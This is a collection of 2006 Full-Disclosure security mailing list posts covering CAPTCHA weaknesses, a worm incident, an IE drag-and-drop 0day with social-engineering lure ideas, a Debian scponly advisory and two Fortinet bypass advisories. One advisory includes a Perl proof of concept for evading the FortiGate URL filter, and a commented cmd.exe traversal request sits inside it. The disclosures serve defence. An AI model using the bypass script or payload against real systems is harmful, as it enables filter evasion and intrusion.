On Mon, 13 Feb 2006 07:09:48 +0100, php0t said: > the global solution against word recognition based challenges? If it was > like that, it would mean that there is no way anybody could make an > image generator that would change its success rate from 90% to 0%... It's *really* *really* difficult to produce a graphic image of letters and numbers that is still recognizable to a human but can't be beaten by a good edge-detection algorithm. For instance, you can "bleed" the edges so that they're fuzzy - but then the human has a hard time telling if it's an 'i' or an 'l', or an 'h' or a 'b' (and so on). I suppose you *could* put up a picture of something, and ask "What is this a picture of" - but then you need a sufficiently large library of images that an attacker can't just download all of them and have a human name each one once. And of course, this has the danger that a user can be left saying: "WTF? Is that an antelope or a gazelle?" pgpQl0CowSL7c.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Need some advice for a new customer
Hi all. I have recently acquired a new customer who had a new version (dropped a new exe file - one that hasn't been seen before they were infected - in the system32 sub-directory) the sdbot worm blow through every machine on their network. The worm is definitely one of the sdbot.worm.gen variants. And, yes, the computer that held their customer credit card info was definitely infected. The I.T. People at this firm failed to patch, or even have a plan to patch the Windows OS. Here's the question: Should the company notify their customers of a POSSIBLE compromise of their data? I have been trying to convince them that they should operate as though the data is compromised. Is that the right position to take as a security consultant? Thanks for your advice and time to think about this. Red ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Internet Explorer drag&drop 0day
Thierry Zoller wrote: Dear Gadi Evron, Just a note Users of Secure-it were already protected against this as it blocks the shell.explorer interface since 2005: http://www.sniff-em.com [Freeware] Cool. Thanks. That's the most polite and non-evasive commercial plug-in I've seen in a while! :) I mean that! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Internet Explorer drag&drop 0day
Dear All, I am looking for ebooks and dumps for the Security Certified Network Professional and the Security Certified Network Associate. Kindly please do send any resources to my personal email or the group so that it would be helpful for everyone who are taking that cert. Thank you so much. Your help is appreciated. Kind Regards, Shyaam ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Internet Explorer drag&drop 0day
Dear Gadi Evron, Just a note Users of Secure-it were already protected against this as it blocks the shell.explorer interface since 2005: http://www.sniff-em.com [Freeware] -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Internet Explorer drag&drop 0day
Matthew Murphy has just disclosed a vulnerability in Internet Explorer. He will send his advisory later today, but as he is unable to right now, he asked me to email this for him. [I didn't want to email the advisory itself as ALL CREDIT BELONGS TO HIM and I didn't want to take the credit away from him in any way. This is 100% his work and his disclosure] Microsoft decided to patch this only next year with SP3. As by now 6 mounths passed since Microsoft was contacted, Matthew alerted them ahead of time he will make a public release on the 13th (today). There have been several attempts to help Matthew and talk to Microsoft (including by me, as well as several others) and convince them this is indeed “bullet-in worthy” to avoid this public release. This is not a critical vulnerability, as it requires user interaction. However, it is serious and shouldn’t be down-played. Here are some interesting ways to exploit this using social engineering: Scroll-bar, “smack the monkey”, moving naked girl (move mouse to make me...), web game, shopping list/wish list, “calibrate your mouse”, etc. The advisory (and suggested work-around) can be found here: http://www.securiteam.com/windowsntfocus/5MP0B0UHPA.html In my opinion, this comes to prove 0days are USUALLY a "myth" (WMF being a good example of a real 0day), as this particular vulnerability has been known to me and some others for some time now awaiting public release. Does anyone still think bad guys don't exploit (to whatever goals) a 0day if it is out there? Gadi. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] working of winpcap
Hi Aditya, i am yogesh , want to know more about winpcap. how it works?still after reading from site winpcap ,i am not able to get depper in it.please helpme by providing some document. Thanks & Regards Yogesh Kumar __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Latest wu-ftpd exploit :-s
http://www.frsirt.com/exploits/08.11.0x82-wu262-advanced.c.php ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: blocking Google Desktop
On 2/11/06, Randall M <[EMAIL PROTECTED]> wrote: > You keep saying version 4, but we are at 3. The above just places google in > the low in file swaping realm. This scares me for security reasons. Sorry... but the latest version I can download from the desktop.google.com web site is version 2. Am I missing something or did they removed the new version from the website? Best Regards. Mamo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 969-1] New scponly packages fix potential root vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 969-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze February 13th, 2006 http://www.debian.org/security/faq - -- Package: scponly Vulnerability : design error Problem type : local Debian-specific: no CVE ID : CVE-2005-4532 Debian Bug : 344418 Max Vozeller discovered a vulnerability in scponly, a utility to restrict user commands to scp and sftp, that could lead to the execution of arbitray commands as root. The system is only vulnerable if the program scponlyc is installed setuid root and if regular users have shell access to the machine. The old stable distribution (woody) does not contain an scponly package. For the stable distribution (sarge) this problem has been fixed in version 4.0-1sarge1. For the unstable distribution (sid) this problem has been fixed in version 4.6-1. We recommend that you upgrade your scponly package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1.dsc Size/MD5 checksum: 600 ef0e45e07cfdd80fd53c0d3cd3daa31e http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1.diff.gz Size/MD5 checksum:27012 96ee81daa1b248fe679106a9d9986b1b http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0.orig.tar.gz Size/MD5 checksum:85053 1706732945996865ed0cccd440b64fc1 Alpha architecture: http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_alpha.deb Size/MD5 checksum:31270 662c573abf24bf1094e939b89acd5575 AMD64 architecture: http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_amd64.deb Size/MD5 checksum:30254 5db48bd53f0ca4fea76091221ceee6ac ARM architecture: http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_arm.deb Size/MD5 checksum:29046 95081c9ab7115b06f4b370bf8ecadae6 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_i386.deb Size/MD5 checksum:29356 1f2e8799c3c018c17734665f2610bef2 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_ia64.deb Size/MD5 checksum:33144 887025e1e4ff759edd4f69005c6c2b3b HP Precision architecture: http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_hppa.deb Size/MD5 checksum:30262 f721669ee692a8b21d975912a0a67f56 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_m68k.deb Size/MD5 checksum:29002 e7d63e25636483f8437b57d897fcd1b3 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_mips.deb Size/MD5 checksum:38582 995a79aab6d2ed7ab4bc37b921462a9e Little endian MIPS architecture: http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_mipsel.deb Size/MD5 checksum:38564 95bbff4502021a1a53f45c014fca20e2 PowerPC architecture: http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_powerpc.deb Size/MD5 checksum:29702 60138f788f40ba7ffc35de22f7bb39cc IBM S/390 architecture: http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_s390.deb Size/MD5 checksum:30060 340a4ed4effca8e9e27643789ea300c9 Sun Sparc architecture: http://security.debian.org/pool/updates/main/s/scponly/scponly_4.0-1sarge1_sparc.deb Size/MD5 checksum:29302 404579837618ae530847774aab4227a3 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (GNU/Linux) iD8DBQFD8GjeW5ql+IAeqTIRAquJAKC36a6m6P8f6hvTOwl4NyB5YzHsMQCfYKhp CPb/UdHwQ
[Full-disclosure] URL filter bypass in Fortinet
URL filter bypass in Fortinet Severity: Low Impact:Bypass Fortinet web filter Vulnerabilty type: Design error Affected products: FortiGate v2.8 CVE reference: CAN-2005-3058 Vulnerability Description: - It is possible to bypass Fortinet URL blocker by making special HTTP requests: - if each line of the request is terminated by CR instead of CRLF - if there's no host field in HTTP/1.0 request Theses request are "tolerated" by the HTTP RFC 2616, par. 19.3, and most of the web servers replyes to them, however, Fortinet failed to parse such URLs. This bug was tested on FortiOS v2.8MR10 and v3beta. The IPS module is not affected by this vulnerabylity. Exploit: --- See the perl scrip below. Solution: No solution available yet. Vendor Response: --- 08/11/2005 The vendor was contacted (using support web site), and a perl script for reproducting the problem was provided 08/16/2005 The vendor asked for more information 08/18/2005 Network dumps and explanations sent to the vendor 08/25/2005 The vendor said this this was escalated to the dev team. 01/04/2006 Status asked to the vendor. 02/06/2006 The vendor was informed that this information will be published in 1 week. Credits: --- Discovered by Mathieu Dessus (mdessus(a)gmail.com). _ Perl script for testing the vuln: # http_req.pl # # Made by (Mathieu Dessus) # # Make a filter for /test* URL in the Fortigate and # remove the # depending on which HTTP request you want to test use IO::Socket; $target = '1.2.3.4'; # Detected $data = "GET /test HTTP/1.1\r Host: $target\r Pragma: no-cache\r Accept: */*\r \r "; # Not detected $data = "GET /test2 HTTP/1.1 Host: $target Pragma: no-cache Accept: */* "; # Not detected $data = "GET /test3 HTTP/1.0\r\n\r\n"; # Detected #$data = "GET /test4 HTTP/1.0\r\nHost: $target\r\n\r\n"; # Detected :) #$data = "GET //c/winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n"; my $sock = new IO::Socket::INET ( PeerAddr => $target, PeerPort => '80', Proto => 'tcp', ); die "Could not create socket: $!\n" unless $sock; print $sock $data; read($sock, $ret, 600); print($ret."\n"); close($sock); ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Bypass Fortinet anti-virus using FTP
Bypass Fortinet anti-virus using FTP Severity: Low Impact:Bypass Fortinet anti-virus Vulnerabilty type: Design error Affected products: FortiGate v2.8 CVE reference: CAN-2005-3057 Vulnerability Description: - It is possible to bypass the Fortinet anti-virus engine when sending files over FTP under certain conditions. Those conditions will be disclosed later since Fortinet has not fixed the problem yet. This bug was tested on FortiOS v2.8MR10 and v3beta. Solution: No solution yet. Vendor Response: --- 07/28/2005 Vendor was first contacted by mail. 07/28/2005 He replyed to use is support web site to re-enter the information. 08/01/2005 The vendor asked for more information, which was provided the same day. 08/04/2005 The vendor replyed that they have reproduced the problem. 01/04/2006 Status asked to the vendor. 02/06/2006 The vendor was informed that this information will be published in 1 week. Credits: --- Discovered by Mathieu Dessus (mdessus(a)gmail.com). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
